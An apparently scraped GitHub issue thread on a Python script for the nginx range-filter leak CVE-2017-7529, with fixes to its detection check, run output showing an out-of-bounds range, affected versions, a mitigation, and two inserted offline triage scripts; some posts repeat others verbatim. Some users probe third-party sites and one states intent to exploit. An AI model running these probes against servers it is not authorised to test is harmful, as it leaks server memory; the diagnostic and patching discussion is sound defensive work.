
Comments (36)

vadimik avatar vadimik commented on July 30, 2024 10

Hi, could you tell me how to use the exploit? Thanks!

from labs.

RackunSec avatar RackunSec commented on July 30, 2024 10

Hello, I got here while searching for an exploit from a HTB system.

To everyone getting the "Unknown Vulnerable" error - update the code like so, starting at line 32:

    httpResponse   = send_http_request(url, headers={ 'Range': content_length })
    if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
        log.info("[+] Vulnerable to CVE-2017-7529")
    else:
        print("[!] Target not vulnerable: HTTP response code: "+str(httpResponse.status_code))

This way, you can actually see the HTTP response code from the target server. If it's not 206, as the logic in the exploit test code shows (if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers), then the server could already be patched for this vulnerability.

This is probably the case if Nginx is installed from the distribution's package repositories.

I hope that this helps.
~Douglas


snorez avatar snorez commented on July 30, 2024 6

This Python script does work. The URL needs to be something like http://xxx/yyy/zzz.png; also, you should modify nginx.conf so that the URL can be accessed.

if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:

NOT

if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:

We need an image file to do this.
The ngx_http_range_header_filter() checks r->allow_range, which is set when the file acquired is an image.

I compiled nginx 1.14.0 without this patch.

test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}

--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325


INFO:__main__:[+] Vulnerable to CVE-2017-7529

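The two checks argued over in this thread (RackunSec's "Content-Range" in httpResponse.headers and snorez's "Content-Range" in httpResponse.text) test different things: nginx answers a single-range request with a Content-Range header, but answers a multi-range request with a multipart/byteranges body in which each part carries its own Content-Range line, so a header-only check never sees the out-of-bounds range snorez pasted. The following is an added example, not the thread's script nor code from the labs repository: it classifies captured responses offline. The Response class stands in for requests.Response, and the sample responses are constructed (the multipart one is rebuilt from snorez's output with the image bytes replaced by a placeholder; the others are hand-made).

```python
import re
from dataclasses import dataclass, field


# Minimal stand-in for requests.Response: only the three attributes the
# thread's checks use. Header keys are compared case-sensitively here.
@dataclass
class Response:
    status_code: int
    headers: dict = field(default_factory=dict)
    text: str = ""


# "bytes -623-60324/60325" -> start=-623, end=60324, total=60325
CONTENT_RANGE_RE = re.compile(r"bytes\s+(-?\d+)-(-?\d+)/(\d+)")


def header_check(resp):
    """The condition RackunSec / LJ-Silver use."""
    return resp.status_code == 206 and "Content-Range" in resp.headers


def text_check(resp):
    """The condition snorez recommends instead."""
    return resp.status_code == 206 and "Content-Range" in resp.text


def multipart_boundary(headers):
    m = re.search(r"boundary=([^;\s]+)", headers.get("Content-Type", ""))
    return m.group(1) if m else None


def content_ranges(resp):
    """Every (start, end, total) the server claims to have served: from the
    Content-Range header of a single-range reply, and from each part of a
    multipart/byteranges body."""
    found = []
    m = CONTENT_RANGE_RE.search(resp.headers.get("Content-Range", ""))
    if m:
        found.append(tuple(int(x) for x in m.groups()))
    boundary = multipart_boundary(resp.headers)
    if boundary:
        for part in resp.text.split("--" + boundary):
            m = re.search(r"Content-Range:\s*" + CONTENT_RANGE_RE.pattern, part)
            if m:
                found.append(tuple(int(x) for x in m.groups()))
    return found


def classify(resp):
    ranges = content_ranges(resp)
    if resp.status_code == 206 and any(s < 0 or e >= t for s, e, t in ranges):
        # A served range that starts before byte 0 or runs past the end of
        # the file is the CVE-2017-7529 symptom shown in snorez's output.
        return "vulnerable"
    if resp.status_code == 206 and ranges:
        return "ranges-honoured"   # ordinary partial content; not an indicator on its own
    if resp.status_code == 416:
        return "range-rejected"    # server refused the range
    if resp.status_code == 200:
        return "range-ignored"     # full body: ranges disabled or r->allow_range unset
    return "unknown"


# Constructed samples (not captures from a live server).
MULTIPART_206 = Response(
    206,
    {"Server": "nginx/1.14.0 (Ubuntu)",
     "Content-Type": "multipart/byteranges; boundary=00000000000000000002"},
    "\r\n--00000000000000000002\r\n"
    "Content-Type: image/png\r\n"
    "Content-Range: bytes -623-60324/60325\r\n\r\n"
    "<png bytes omitted>\r\n"
    "--00000000000000000002--\r\n",
)
SINGLE_206 = Response(206, {"Server": "nginx/1.14.0 (Ubuntu)", "Content-Type": "image/png",
                            "Content-Range": "bytes 0-99/60325"}, "<100 png bytes omitted>")
PLAIN_200 = Response(200, {"Server": "nginx/1.11.10", "Content-Type": "text/html"},
                     "<html>Hello World</html>")
REJECTED_416 = Response(416, {"Server": "nginx/1.10.3 (Ubuntu)",
                              "Content-Range": "bytes */60325"}, "")

if __name__ == "__main__":
    for name, r in [("multipart 206", MULTIPART_206), ("single 206", SINGLE_206),
                    ("plain 200", PLAIN_200), ("416", REJECTED_416)]:
        print(f"{name:14} header_check={header_check(r)!s:5} "
              f"text_check={text_check(r)!s:5} -> {classify(r)}")
```

On the multipart sample the header check returns False and the text check True, which is the disagreement in the thread; on the single-range sample it is the other way round, and the header check would report an ordinary, correctly served range as "vulnerable". Looking at the parsed ranges, not just at where the string appears, separates the two cases.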

siochs avatar siochs commented on July 30, 2024 5

Still curious why the exploit does not work using a vulnerable nginx-proxy running in a Docker container.


thehappydinoa avatar thehappydinoa commented on July 30, 2024 5

I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115


noraj avatar noraj commented on July 30, 2024 4

You may want to submit your exploit @ https://www.exploit-db.com/submit/


woei66 avatar woei66 commented on July 30, 2024 2

Is there a solution for this? Is it a high-risk issue?


LJ-Silver avatar LJ-Silver commented on July 30, 2024 1

In the line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
needs to be replaced by
httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:

After that change, I'm still getting:

INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:[?] Unknown Vulnerable

any idea?


marcelo321 avatar marcelo321 commented on July 30, 2024 1

It appears that nginx/1.12.1 isn't vulnerable, but it is in the range 0.5.6 - 1.13.2. Can someone verify this, please?


Jaganmohan029 avatar Jaganmohan029 commented on July 30, 2024

Copy the code and paste it into Notepad on Windows, or whatever OS you're using, and run it using the following command:
python "text file name".py "URL you want to exploit"

ex: python3 test.py http://www."URL".com


siochs avatar siochs commented on July 30, 2024

Hmm, just tried the following:
docker run -d -p 80:80 -v /var/run/docker.sock:/tmp/docker.sock:ro jwilder/nginx-proxy:0.6.0
docker run -d --expose 80 -e VIRTUAL_HOST=foo.bar.com tutum/hello-world
On the host, I added 127.0.0.1 foo.bar.com to /etc/hosts to get foo.bar.com resolved.
curl -L foo.bar.com
outputs "Hello World", so the nginx-proxy is working.
python CVE-2017-7529.py http://foo.bar.com/etc/fstab
outputs

INFO:__main__:target: http://foo.bar.com/etc/fstab
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:[?] Unknown Vulnerable

According to the Dockerfile and to the proxy replies, the nginx version is 1.11.10, so the bug should apply, right?


nixawk avatar nixawk commented on July 30, 2024

Thanks @siochs . I will try to review it.


woei66 avatar woei66 commented on July 30, 2024

I found an article about this issue and it looks like there is a patch for it.
Let's wait for the new release with this patch code.
Thank you.

https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7529.html

the following configuration can
be used as a temporary workaround:
max_ranges 1;
http://nginx.org/download/patch.2017.ranges.txt


r3k2 avatar r3k2 commented on July 30, 2024

https://access.redhat.com/security/cve/cve-2017-7529 FYI.


murat-kaya avatar murat-kaya commented on July 30, 2024

@siochs Change this;
"Content-Range" in httpResponse.text
to this
"Content-Range" in httpResponse.headers


qre0ct avatar qre0ct commented on July 30, 2024

This still does not seem to work and I get the same error as @siochs. Any further suggestions?


jatoch avatar jatoch commented on July 30, 2024

It didn't work for me as well.


sangeeta667143 avatar sangeeta667143 commented on July 30, 2024

Didn't work for me as well.
Same output for me also:
NFO:main:target: http://www.examlpe.com
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:[?] Unknown Vulnerable


tiropas avatar tiropas commented on July 30, 2024

What version of Python are you all using? Sometimes, if the version isn't correct, Python gives out errors.


 avatar commented on July 30, 2024

I get the same error as @siochs. Any idea how to resolve it?


jatoch avatar jatoch commented on July 30, 2024

INFO:main:[?] Unknown Vulnerable


avi2606 avatar avi2606 commented on July 30, 2024

Same error here too:
INFO:main:status: 200: Server: nginx
INFO:main:status: 200: Server: nginx
INFO:main:[?] Unknown Vulnerable


Abdelkad3r avatar Abdelkad3r commented on July 30, 2024

Same error here too:
INFO:main:target: https://url.com
INFO:main:status: 200: Server: nginx/1.12.1
INFO:main:status: 200: Server: nginx/1.12.1
INFO:main:[?] Unknown Vulnerable


iamdevnull avatar iamdevnull commented on July 30, 2024

Same error here too:

INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): site.com
INFO:__main__:status: 416: Server: nginx/1.10.3 (Ubuntu)
INFO:__main__:[?] Unknown Vulnerable

Any idea?


jatoch avatar jatoch commented on July 30, 2024

Not vulnerable: 1.13.3+, 1.12.1+
Vulnerable: 0.5.6-1.13.2

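A triage helper that applies the version boundaries jatoch lists (affected 0.5.6 to 1.13.2; fixed in 1.12.1 on the stable branch and 1.13.3 on mainline) to the Server banner the script logs. This is an added example, not code from the thread or the labs repository; the boundary tuples are taken from the comment above and the sample banners are constructed from Server headers pasted in this thread. As RackunSec notes, distribution packages may carry the fix without changing the banner (the 1.10.3 (Ubuntu) results above), so a banner inside the range is a reason to test the range behaviour, not a finding on its own.

```python
import re

VERSION_RE = re.compile(r"nginx/(\d+)\.(\d+)\.(\d+)")

# Boundaries as given in the thread.
FIRST_AFFECTED = (0, 5, 6)
LAST_AFFECTED = (1, 13, 2)
STABLE_FIXED = (1, 12, 1)      # 1.12.1 and later 1.12.x carry the fix
MAINLINE_NEXT = (1, 13, 0)     # 1.13.0 - 1.13.2 are still affected


def parse_version(server_header):
    """'nginx/1.14.0 (Ubuntu)' -> (1, 14, 0); None when the banner carries no
    version (a bare 'Server: nginx', as avi2606's output shows)."""
    m = VERSION_RE.search(server_header or "")
    return tuple(int(x) for x in m.groups()) if m else None


def version_in_affected_range(version):
    """True/False for a parsed version, None when no version is known."""
    if version is None:
        return None
    if version < FIRST_AFFECTED or version > LAST_AFFECTED:
        return False
    if STABLE_FIXED <= version < MAINLINE_NEXT:
        return False
    return True


def assess(server_header):
    """Turn a Server header into a short triage verdict."""
    verdict = version_in_affected_range(parse_version(server_header))
    if verdict is None:
        return "unknown: banner has no version; test the range behaviour directly"
    if verdict:
        return "banner in affected range: confirm with a range test, distro builds may be patched"
    return "banner outside affected range"


# Constructed from Server headers pasted in the thread.
SAMPLE_BANNERS = [
    "nginx/1.14.0 (Ubuntu)", "nginx/1.11.10", "nginx/1.10.3 (Ubuntu)",
    "nginx/1.12.1", "nginx/1.8.0", "nginx/1.13.9", "nginx/1.15.9", "nginx",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(f"{banner:24} {assess(banner)}")
```

Comparing tuples keeps the ordering correct across the two-digit minor versions (1.9.x sorts before 1.10.x), which a string comparison on the banner would get wrong.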

theaayushanand avatar theaayushanand commented on July 30, 2024

Change "Content-Range" in httpResponse.text to "Content-Range" in httpResponse.headers


elcolie avatar elcolie commented on July 30, 2024

I got httpResponse.status_code == 200. Is that OK?


sakurakishiro avatar sakurakishiro commented on July 30, 2024

The same error.
INFO:__main__:target: (http://www.****.com)
INFO:__main__:status: 200: Server: nginx/1.8.0
INFO:__main__:status: 200: Server: nginx/1.8.0
INFO:__main__:[?] Unknown Vulnerable


hlw0159 avatar hlw0159 commented on July 30, 2024

Hey, I found nginx/1.13.9. CVE???


technick333 avatar technick333 commented on July 30, 2024

In the line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
needs to be replaced by
httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:


hlw0159 avatar hlw0159 commented on July 30, 2024


skesineni avatar skesineni commented on July 30, 2024

Hello, we've updated our Nginx to the new version 1.15.9 but are still getting the "Vulnerable to CVE-2017-7529" message. Why is it still showing that message instead of "Unknown Vulnerable" after we updated to the latest version? Can anyone give any input? Thanks!

INFO:main:status: 200: Server:
INFO:main:status: 206: Server:
INFO:main:[+] Vulnerable to CVE-2017-7529


hackersden09 avatar hackersden09 commented on July 30, 2024

Can anyone tell me what this response means?
I want to exploit this vuln.
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:[?] Unknown Vulnerable


rjw245 avatar rjw245 commented on July 30, 2024

I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115

The gist ignores snorez's advice to look for Content-Range in the response text as opposed to the header.


rjw245 avatar rjw245 commented on July 30, 2024

This Python script does work. The URL needs to be something like http://xxx/yyy/zzz.png; also, you should modify nginx.conf so that the URL can be accessed.

if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:

NOT

if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:

We need an image file to do this.
The ngx_http_range_header_filter() checks r->allow_range, which is set when the file acquired is an image.

I compiled nginx 1.14.0 without this patch.

test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}

--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325


INFO:__main__:[+] Vulnerable to CVE-2017-7529

@snorez Will HTTPS not work for reproducing this exploit?


Otojon avatar Otojon commented on July 30, 2024

Hmm? Interesting.... The exploit is not working with a vulnerable server.

